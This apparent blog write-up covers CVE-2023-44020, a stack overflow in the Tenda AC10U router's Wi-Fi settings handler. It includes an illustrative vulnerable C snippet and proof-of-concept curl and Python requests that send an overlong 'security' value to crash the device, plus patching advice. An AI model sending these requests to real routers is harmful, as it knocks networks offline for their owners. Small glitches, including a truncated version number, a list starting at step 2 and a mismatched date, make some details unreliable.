CVE-2023-44020 - Stack Overflow in Tenda AC10U (V1.) via 'security' Parameter in formWifiBasicSet

In late 2023, security researchers discovered a serious vulnerability—CVE-2023-44020—in the Tenda AC10U router, version 1., specifically the firmware US_AC10UV1.RTL_V15.03.06.49_multi_TDE01. This bug allows attackers to perform a stack overflow attack through the security parameter in the formWifiBasicSet function. Here’s what you need to know, how it works, and a walk-through demonstration.

What is Tenda AC10U?

The Tenda AC10U is a popular home and office Wi-Fi router favored for its affordability and features. However, like most IoT devices, it's also a potential target if vulnerabilities are discovered and left unpatched.

Technical Analysis

The bug lies in how the router’s web management portal handles the security parameter inside the formWifiBasicSet function. If a user sends an overlong string for this parameter, the system does not properly check the length, leading to a stack overflow.

Below is a simplified look at the vulnerable code

void formWifiBasicSet(request_t *req) {
    char security[64];
    // ... other declarations

    // User input copied without length checking!
    strcpy(security, get_cgi_param(req, "security")); // unsafe!

    // Carry on with processing...
}

Send a crafted HTTP request with an extra-long value for the security parameter.

2. The router's web admin endpoint (/goform/WifiBasicSet) processes the request.

Example Exploit (Proof of Concept)

> Warning: Only run this in a test environment! Do not attack devices you do not own or have permission to test.

Here’s an example using curl in bash

curl -X POST \
  -d "security=$(python3 -c 'print("A"*128)')" \
  http://ROUTER_IP/goform/WifiBasicSet

Or in Python

import requests

url = 'http://ROUTER_IP/goform/WifiBasicSet'
data = {
    'security': 'A' * 128  # 128 bytes triggers the overflow
}

response = requests.post(url, data=data)
print("Status:", response.status_code)
print("Response:", response.text)

Result: The router may crash, reboot, or become unresponsive.

Mitigation

- Update Firmware: Check Tenda's firmware update page for the latest version. If there’s no patch, contact Tenda support.

Related References

- Original CVE record (NVD)
- Exploit Database Reference *(if available)*
- Vendor Download Page
- Firmware listing for Tenda AC10U

Final Thoughts

Stack overflows in IoT devices like the Tenda AC10U are serious—especially when exposed to the Internet. Unauthorized users can crash your network or potentially hijack your device, leading to deeper network compromise.

Always patch your devices, restrict remote admin access, and follow basic IoT security advice.

Stay safe online!

*If you found this useful, please share and encourage others to keep their home/office networks protected.*

Timeline

Published on: 09/27/2023 15:19:35 UTC
Last modified on: 09/27/2023 18:45:01 UTC